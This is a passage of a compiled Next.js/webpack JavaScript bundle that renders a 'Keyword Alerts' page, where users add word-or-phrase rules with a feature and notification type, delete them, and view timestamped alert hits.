            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(ScrollDiv, {
                className: "bg-white w-full !h-[calc(var(--vh2)*100-278px)] smj:!h-[calc(var(--vh2)*100-155px)] [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] overflow-auto relative",
                children: [
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "".concat(nowPage !== 0 ? "hidden" : "smjs:flex", " smjs:!h-[calc(var(--vh2)*100-278px)] smjs:overflow-hidden"),
                        children: [
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "smjs:min-w-[460px] smj:w-full smjs:!h-[calc(var(--vh2)*100-278px)] smj:h-auto smjs:[border-right:1px_solid_#DCDCDC] smj:p-[16px_10px_30px_10px] smjs:p-[36px_30px_0px_30px]",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                        className: "mb-[10px] text-[16px] font-[Poppins] font-[600] leading-[24px] smj:hidden",
                                        children: t("Add Rule")
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                        className: "[border:1px_solid_#DCDCDC] rounded-[8px] p-[18px_30px_30px_30px] smj:p-[15px_10px_24px_16px]",
                                        children: [
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                className: "mb-[27px] text-[16px] font-[Poppins] font-[600] leading-[24px] smjs:hidden",
                                                children: t("Add Rule")
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "text-[12px] smj:text-[13px] font-[Poppins] font-[400] leading-[18px] smj:leading-[19.5px] mb-[4px] smj:mb-[3px]",
                                                children: t("Word or Phrase")
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("input", {
                                                id: "wordText",
                                                type: "text",
                                                placeholder: t("Enter word or phrase"),
                                                className: "w-full h-[40px] smj:h-[36px] bg-[#F4F5F6] rounded-[30px] outline-none\n                  ".concat(wordFlag === 1 ? "shadow-[inset_0px_0px_0px_1px_red] placeholder:text-red-500 caret-red-500" : "focus:shadow-[inset_0px_0px_0px_1px_#2405F2] caret-[#2405F2]", "\n                  pl-[18px] text-[12px] text-[#000000] placeholder:text-[#9E9E9E] placeholder:font-[Poppins] placeholder:font-[400] placeholder:leading-[18px]"),
                                                value: wordValue,
                                                onChange: (e)=>{
                                                    if (e.target.value.trim() !== "") setWordFlag(0);
                                                    setWordValue(e.target.value);
                                                }
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "text-[12px] smj:text-[13px] font-[Poppins] font-[400] leading-[18px] smj:leading-[19.5px] mt-[12px] smj:mt-[11px] mb-[4px] smj:mb-[3px]",
                                                children: t("Select Features")
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                className: "cursor-pointer relative",
                                                children: [
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                        className: "w-full h-[40px] smj:h-[36px] flex items-center bg-[#F4F5F6] rounded-[30px] relative pl-[18px] ".concat(activeFeatures === true ? "shadow-[inset_0px_0px_0px_1px_#2405F2]" : "", " mb-[3px]"),
                                                        onClick: ()=>{
                                                            if (!activeFeatures) {
                                                                document.getElementsByClassName("scrollUl1")[0].scrollTop = 0 // 重置下拉框的滚动条进度
                                                                ;
                                                                setActiveNotify(false) // 关闭另一个下拉框
                                                                ;
                                                            }
                                                            setActiveFeatures(!activeFeatures);
                                                        },
                                                        children: [
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("span", {
                                                                className: "text-[12px] text-[#9E9E9E] font-[Poppins] font-[400] leading-[18px]",
                                                                children: featureValue
                                                            }),
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_2___default()), {
                                                                src: "/images/navigation/down-arrow.svg",
                                                                width: 15,
                                                                height: 15,
                                                                alt: "arrow",
                                                                className: "absolute top-[50%] -translate-y-[50%] right-[12px] transition-transform duration-200 ease-linear ".concat(activeFeatures ? "rotate-[180deg]" : "rotate-0")
                                                            })
                                                        ]
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(ScrollUl, {
                                                        className: "bg-white scrollUl1 w-full max-h-0 overflow-auto [box-shadow:0px_0px_8px_0px_#00000026] rounded-[8px] transition-[max-height] duration-200 ease-linear ".concat(activeFeatures ? "max-h-[350px]" : "", " absolute z-[5254]"),
                                                        children: dictionaries.selectFeatures.list.map((item, index)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("li", {
                                                                className: "text-[14px] font-[Poppins] font-[400] leading-[21px] bg-[#FFFFFF] p-[12px_0px_12px_18px] ".concat(featureValue === item.key ? "text-[#2405F2]" : " text-[#222222] hover:bg-[#F5F5F5]"),
                                                                onClick: ()=>{
                                                                    setFeatureValue(item.key);
                                                                    setActiveFeatures(false);
                                                                },
                                                                children: item.key
                                                            }, index))
                                                    })
                                                ]
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "text-[12px] smj:text-[13px] font-[Poppins] font-[400] leading-[18px] smj:leading-[19.5px] mt-[10px] smj:mt-[11px] mb-[4px] smj:mb-[3px]",
                                                children: t("Notification Type")
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                className: "cursor-pointer relative",
                                                children: [
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                        className: "w-full h-[40px] smj:h-[36px] flex items-center bg-[#F4F5F6] rounded-[30px] relative pl-[18px] ".concat(activeNotify === true ? "shadow-[inset_0px_0px_0px_1px_#2405F2]" : "", " mb-[3px]"),
                                                        onClick: ()=>{
                                                            if (!activeNotify) {
                                                                document.getElementsByClassName("scrollUl2")[0].scrollTop = 0 // 重置下拉框的滚动条进度
                                                                ;
                                                                setActiveFeatures(false) // 关闭另一个下拉框
                                                                ;
                                                            }
                                                            setActiveNotify(!activeNotify);
                                                        },
                                                        children: [
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("span", {
                                                                className: "text-[12px] text-[#9E9E9E] font-[Poppins] font-[400] leading-[18px]",
                                                                children: notifyValue
                                                            }),
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_2___default()), {
                                                                src: "/images/navigation/down-arrow.svg",
                                                                width: 15,
                                                                height: 15,
                                                                alt: "arrow",
                                                                className: "absolute top-[50%] -translate-y-[50%] right-[12px] transition-transform duration-200 ease-linear ".concat(activeNotify ? "rotate-[180deg]" : "rotate-0")
                                                            })
                                                        ]
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(ScrollUl, {
                                                        className: "bg-white scrollUl2 w-full max-h-0 overflow-auto [box-shadow:0px_0px_8px_0px_#00000026] rounded-[8px] transition-[max-height] duration-200 ease-linear ".concat(activeNotify ? "max-h-[92px]" : "", " absolute z-[5254]"),
                                                        children: dictionaries.notificationType.list.map((item, index)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("li", {
                                                                className: "text-[14px] font-[Poppins] font-[400] leading-[21px] bg-[#FFFFFF] ".concat(index === 0 ? "p-[12px_0px_12px_18px]" : "p-[12px_0px_12px_18px]", " ").concat(notifyValue === item.key ? "text-[#2405F2]" : " text-[#222222] hover:bg-[#F5F5F5]"),
                                                                onClick: ()=>{
                                                                    setNotifyValue(item.key);
                                                                    setActiveNotify(false);
                                                                },
                                                                children: item.key
                                                            }, index))
                                                    })
                                                ]
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                className: "flex justify-center mt-[30px]",
                                                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("button", {
                                                    className: "w-[180px] h-[40px] smj:h-[36px] bg-[#FFCF55] rounded-[30px] text-[12px] text-[#000000] font-[Poppins] font-[600] leading-[18px]",
                                                    onClick: ()=>{
                                                        if (wordValue.trim() === "") {
                                                            setWordFlag(1);
                                                            document.getElementById("wordText").focus();
                                                        } else addData();
                                                    },
                                                    children: t("Add")
                                                })
                                            })
                                        ]
                                    })
                                ]
                            }),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "w-full p-[36px_30px_10px_36px] smj:p-[0px_0px_0px_18px] overflow-auto",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                        className: "pb-[10px] text-[16px] font-[Poppins] font-[600] leading-[24px] smj:hidden",
                                        children: t("Added Rules")
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(ScrollUlShow, {
                                        ref: (e)=>{
                                            if (nowPage === 0) leftDom.current = e;
                                        },
                                        className: "w-full h-auto smjs:pr-[30px] overflow-auto",
                                        children: [
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                className: "w-full flex items-center",
                                                children: [
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("li", {
                                                        className: "grid grid-cols-3 items-center bg-[#FFF] sticky top-0 text-[14px] text-[#000000] font-[Poppins] font-[600] leading-[21px] flex-grow relative",
                                                        children: [
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                className: "p-[22px_0px_16px_26px] smj:p-[0px_0px_0px_0px]",
                                                                children: t("Keywords")
                                                            }),
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                className: "p-[22px_0px_16px_0px] smj:p-[0px_0px_0px_0px]",
                                                                children: t("Features")
                                                            }),
                                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                className: "p-[22px_0px_16px_0px] smj:p-[0px_18px_0px_0px]",
                                                                children: t("Notification Type")
                                                            })
                                                        ]
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                        className: "mx-[25px] text-[14px] font-[Roboto] leading-[16px] text-[#2A99FF] opacity-0 smj:hidden",
                                                        children: t("Delete rule")
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_2___default()), {
                                                        src: "/images/navigation/delete.svg",
                                                        width: 20,
                                                        height: 20,
                                                        alt: "delete rule",
                                                        className: "smj:mx-[12px] opacity-0 smjs:hidden"
                                                    })
                                                ]
                                            }),
                                            showLeftData && showLeftData.map((item, index)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                    className: "flex items-center w-full [border-bottom:1px_solid_#DCDCDC]",
                                                    children: [
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("li", {
                                                            i: true,
                                                            className: "grid grid-cols-3 items-center text-[14px] text-[#000000] font-[Poppins] font-[400] leading-[21px] flex-grow last:border-none",
                                                            children: [
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                    className: "p-[13px_0px_14px_26px] smj:p-[21px_0px_22px_0px]",
                                                                    children: item.text
                                                                }),
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                    className: "p-[13px_0px_14px_0px] smj:p-[21px_0px_22px_0px]",
                                                                    children: item.feature
                                                                }),
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                                    className: "p-[13px_0px_14px_0px] smj:p-[21px_18px_22px_0px]",
                                                                    children: t("Notify to email")
                                                                })
                                                            ]
                                                        }),
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                            className: "mx-[25px] text-[14px] font-[Roboto] leading-[16px] text-[#2A99FF] smj:hidden cursor-pointer",
                                                            onClick: ()=>Delete({
                                                                    feature: item.feature,
                                                                    text: item.text
                                                                }),
                                                            children: t("Delete rule")
                                                        }),
                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_2___default()), {
                                                            src: "/images/navigation/delete.svg",
                                                            width: 20,
                                                            height: 20,
                                                            alt: "delete rule",
                                                            className: "smj:mx-[12px] smjs:hidden",
                                                            onClick: ()=>Delete({
                                                                    feature: item.feature,
                                                                    text: item.text
                                                                })
                                                        })
                                                    ]
                                                }, index))
                                        ]
                                    })
                                ]
                            })
                        ]
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "w-full ".concat(nowPage === 0 ? "hidden" : ""),
                        children: [
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(ScrollUlShow, {
                                ref: rightDom,
                                className: "w-full !h-[calc(var(--vh2)*100-278px)] smj:!h-[calc(var(--vh2)*100-155px)] p-[0px_30px_10px_62px] smj:p-[0px_0px_10px_18px] overflow-auto",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("li", {
                                        className: "grid grid-cols-3 bg-[#FFF] sticky top-0 text-[14px] text-[#000000] font-[Poppins] font-[600] leading-[21px] mb-[1px] relative",
                                        children: [
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "p-[36px_0px_16px_0px] smj:pt-[20px]",
                                                children: t("Keywords")
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "p-[36px_0px_16px_0px] smj:pt-[20px]",
                                                children: t("Features")
                                            }),
                                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                className: "p-[36px_0px_16px_0px] smj:pt-[20px]",
                                                children: t("Time")
                                            })
                                        ]
                                    }),
                                    showRightData.map((item, index)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("li", {
                                            i: true,
                                            className: "grid grid-cols-3 items-center text-[14px] text-[#000000] font-[Poppins] font-[400] leading-[21px] [border-top:1px_solid_#DCDCDC]",
                                            children: [
                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                    className: "p-[15px_0px_12px_0px] smj:p-[11px_0px_11px_0px]",
                                                    children: item.text
                                                }),
                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                    className: "p-[15px_0px_12px_0px] smj:p-[11px_0px_11px_0px]",
                                                    children: item.feature
                                                }),
                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                                                    className: "p-[15px_0px_12px_0px] smj:p-[11px_21px_11px_0px]",
                                                    children: dayjs__WEBPACK_IMPORTED_MODULE_3___default()(item.time).format("MMM DD, YYYY HH:mm")
                                                })
                                            ]
                                        }, index))
                                ]
                            }),
                            isLoading ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                className: "absolute inset-0 z-[20] bg-[#FFF] rounded-[10px]",
                                children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_11__/* ["default"] */ .Z, {})
                            }) : null,
                            showRightData.length > 0 || isLoading || /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "text-center px-5 absolute inset-0 flex justify-center items-center pointer-events-none",
                                children: [
                                    t("It appears theres no data to show here yet"),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                                    t("If data exists it may take up to 1 hour to download and appear"),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                                    t("We suggest checking back in a little while")
                                ]
                            })
                        ]
                    })
                ]
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["default"] = (KeywordAlerts);


/***/ }),

/***/ 74249:
/***/ (function(module) {

// extracted by mini-css-extract-plugin
module.exports = {"contentLoadingRoot":"ContentLoading_contentLoadingRoot__ypzGH","contentLoadingRootFullScreen":"ContentLoading_contentLoadingRootFullScreen__ZmB8e","contentLoadingSpinner":"ContentLoading_contentLoadingSpinner__4vCxU","content-loading-spin":"ContentLoading_content-loading-spin__K0YUP","contentLoadingLabel":"ContentLoading_contentLoadingLabel__S0w79"};

/***/ })

},
/******/ function(__webpack_require__) { // webpackRuntimeModules
/******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); }
/******/ __webpack_require__.O(0, [5675,9774,2888,179], function() { return __webpack_exec__(92750); });
/******/ var __webpack_exports__ = __webpack_require__.O();
/******/ _N_E = __webpack_exports__;
/******/ }
]);